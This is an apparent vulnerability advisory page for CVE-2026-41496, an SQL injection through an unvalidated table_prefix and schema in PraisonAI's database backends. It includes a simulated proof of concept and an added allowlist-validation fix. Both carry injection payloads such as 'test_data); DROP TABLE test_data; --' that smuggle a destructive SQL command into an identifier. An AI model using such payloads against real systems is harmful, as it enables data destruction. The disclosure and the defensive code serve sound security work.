Security Vulnerability Report
CVE-2026-41496 CVSS 8.1 HIGH

Published: 2026-05-08 14:16:34
Last Modified: 2026-05-09 00:16:28

Description

PraisonAI is a multi-agent teams system. Prior to praisonai version 4.6.9 and praisonaiagents version 1.6.9, the fix for CVE-2026-40315 added input validation to SQLiteConversationStore only. Nine sibling backends — MySQL, PostgreSQL, async SQLite/MySQL/PostgreSQL, Turso, SingleStore, Supabase, SurrealDB — pass table_prefix straight into f-string SQL. Same root cause, same code pattern, same exploitation. 52 unvalidated injection points across the codebase. postgres.py additionally accepts an unvalidated schema parameter used directly in DDL. This issue has been patched in praisonai version 4.6.9 and praisonaiagents version 1.6.9.

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
Weakness: CWE-89 (SQL injection)

Configurations (Affected Products)

cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:praison:praisonaiagents:*:*:*:*:*:python:*:* - VULNERABLE
PraisonAI < 4.6.9
praisonaiagents < 1.6.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-41496: SQL Injection in PraisonAI backends
# This PoC demonstrates how a malicious table_prefix leads to SQL injection

class VulnerableBackend:
    def __init__(self, table_prefix):
        # Vulnerable code pattern: the prefix is stored and later interpolated
        # directly into SQL with an f-string, with no validation
        self.table_prefix = table_prefix

    def create_table(self):
        # Simulating the vulnerable SQL construction found in mysql.py, postgres.py, etc.
        # The table_prefix is not sanitized.
        query = f"CREATE TABLE IF NOT EXISTS {self.table_prefix}_data (id INT, value TEXT);"
        print(f"[DEBUG] Executing SQL: {query}")
        # In a real scenario, this query would be executed against the database
        return query


# Exploit Scenario
# Attacker crafts a payload to break out of the table name context
# Payload: test_data); DROP TABLE test_data; --
malicious_input = "test_data); DROP TABLE test_data; --"
backend = VulnerableBackend(table_prefix=malicious_input)
# This generates: CREATE TABLE IF NOT EXISTS test_data); DROP TABLE test_data; --_data (id INT, value TEXT);
# Depending on the DB backend, this could result in data deletion or injection of other SQL commands.
backend.create_table()
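The defensive counterpart to the pattern above, as an added example that is not PraisonAI's own patch: because a table prefix or schema name cannot be passed as a bind parameter, the fix pattern is to allowlist the identifier before it is ever interpolated into DDL, and to reject anything else at construction time. The class, function and regex below are hypothetical names chosen for this illustration.

```python
import re

# Allowlist for SQL identifiers supplied by configuration: a leading letter or
# underscore, then letters, digits or underscores, at most 63 characters.
# This is an assumed policy for the example, not PraisonAI's own validator.
_IDENTIFIER_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]{0,62}$")


def validate_identifier(value: str, what: str = "identifier") -> str:
    """Return value unchanged if it is a safe bare SQL identifier, else raise."""
    if not isinstance(value, str) or not _IDENTIFIER_RE.fullmatch(value):
        raise ValueError(f"invalid SQL {what}: {value!r}")
    return value


class HardenedBackend:
    """Hypothetical store that validates prefix and schema before any DDL."""

    def __init__(self, table_prefix: str, schema: str = "public"):
        # Reject at construction so a bad value never reaches the database.
        self.table_prefix = validate_identifier(table_prefix, "table_prefix")
        self.schema = validate_identifier(schema, "schema")

    def create_table_sql(self) -> str:
        # Identifiers are validated and then double-quoted; row data would
        # still go through bind parameters, never through string formatting.
        table = f'"{self.schema}"."{self.table_prefix}_data"'
        return f"CREATE TABLE IF NOT EXISTS {table} (id INT, value TEXT);"


def try_build(table_prefix: str, schema: str = "public") -> str:
    """Return the DDL string, or the rejection message when input is refused."""
    try:
        return HardenedBackend(table_prefix, schema).create_table_sql()
    except ValueError as exc:
        return str(exc)


if __name__ == "__main__":
    # Constructed inputs: a benign prefix, the advisory's breakout payload,
    # and a schema value of the same shape (postgres.py's unvalidated schema).
    print(try_build("conversations"))
    print(try_build("test_data); DROP TABLE test_data; --"))
    print(try_build("conversations", schema='public"; DROP SCHEMA public; --'))
```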

References

https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-rg3h-x3jw-7jm5 (Exploit, Vendor Advisory)
